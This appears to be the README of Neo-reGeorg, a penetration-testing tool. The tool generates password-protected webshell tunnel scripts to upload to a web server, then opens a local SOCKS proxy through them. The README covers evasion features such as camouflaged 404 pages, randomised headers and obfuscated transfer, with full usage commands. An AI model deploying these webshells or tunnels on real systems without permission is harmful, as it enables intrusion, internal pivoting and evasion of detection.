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File metadata and controls

168 lines (117 loc) · 5.07 KB


简体中文 | English

Neo-reGeorg is a project designed to actively restructure reGeorg with the aim of:

  • Improve tunnel connection security
  • Improve usability and avoid feature detection
  • Improve the confidentiality of transmission content
  • Solve the existing problems of reGeorg and fix some small bugs


  • Transfer content through out-of-order base64 encryption
  • GET request response can be customized (such as masquerading 404 pages)
  • HTTP Headers instructions are randomly generated to avoid feature detection
  • HTTP Headers can be customized
  • Compatible with python2 / python3




Basic Usage

  • Step 1. Set the password to generate tunnel server.(aspx|ashx|jsp|jspx|php) and upload it to the web server.
$ python generate -k password

    [+] Create neoreg server files:
       => neoreg_server/tunnel.nosocket.php
       => neoreg_server/tunnel.js
       => neoreg_server/tunnel.php
       => neoreg_server/tunnel.ashx
       => neoreg_server/tunnel.aspx
       => neoreg_server/tunnel.tomcat.5.jsp
       => neoreg_server/tunnel.tomcat.5.jspx
       => neoreg_server/tunnel.jsp
       => neoreg_server/tunnel.jspx
  • Step 2. Use to connect to the web server and create a socks proxy locally.
$ python3 -k password -u http://xx/tunnel.php
  Log Level set to [ERROR]
  Starting socks server [], tunnel at [http://k/tunnel.php]

Note that if your tool, such as nmap does not support socks proxy, please use proxychains

Advanced Usage

  1. Support for generated tunnel server-side, the default GET request responds to the specified page content (eg camouflaged 404 page)
$ python generate -k <you_password> --file 404.html
$ python -k <you_password> -u <server_url> --skip
  1. For example, the server WEB needs to set the proxy to access
$ python -k <you_password> -u <server_url> --proxy socks5://
  1. To set Authorization, there are also custom Header or Cookie content.
$ python -k <you_password> -u <server_url> -H 'Authorization: cm9vdDppcyB0d2VsdmU=' --cookie "key=value;key2=value2"
  • For more information on performance and stability parameters, refer to -h help information
# Generate server-side scripts
$ python generate -h
    usage: [-h] -k KEY [-o DIR] [-f FILE] [--read-buff Bytes]

    Generate neoreg webshell

    optional arguments:
      -h, --help            show this help message and exit
      -k KEY, --key KEY     Specify connection key.
      -o DIR, --outdir DIR  Output directory.
      -f FILE, --file FILE  Camouflage html page file
      --read-buff Bytes     Remote read buffer.(default: 513)

# Connection server
$ python -h
    usage: [-h] -u URI -k KEY [-l IP] [-p PORT] [-s] [-H LINE] [-c LINE]
                     [-x LINE] [--read-buff Bytes] [--read-interval MS]
                     [--max-threads N] [-v]

    Socks server for Neoreg HTTP(s) tunneller
    DEBUG MODE: -k (debug_all|debug_base64|debug_headers_key|debug_headers_values)

    optional arguments:
      -h, --help            show this help message and exit
      -u URI, --url URI     The url containing the tunnel script
      -k KEY, --key KEY     Specify connection key
      -l IP, --listen-on IP
                            The default listening address.(default:
      -p PORT, --listen-port PORT
                            The default listening port.(default: 1080)
      -s, --skip            Skip usability testing
      -H LINE, --header LINE
                            Pass custom header LINE to server
      -c LINE, --cookie LINE
                            Custom init cookies
      -x LINE, --proxy LINE
                            proto://host[:port] Use proxy on given port
      --read-buff Bytes     Local read buffer, max data to be sent per
                            POST.(default: 1024)
      --read-interval MS    Read data interval in milliseconds.(default: 100)
      --max-threads N       Proxy max threads.(default: 1000)
      -v                    Increase verbosity level (use -vv or more for greater


  • Solving tennel.js cannot continue TCP connection problems

  • HTTP body steganography

  • Transfer Target field steganography

  • Confuse/Anti-Virus/Compress server-side scripts Should be modular, standalone tool


GPL 3.0

Change log

v1.1.0 - Added jspx support

v1.2.0 - Added -k debug_all (or debug_base64|debug_headers_key|debug_headers_values), Easy to debug

v1.3.0 - Fixed --cookie JSESSIONID conflict, unavailable in load balancing environment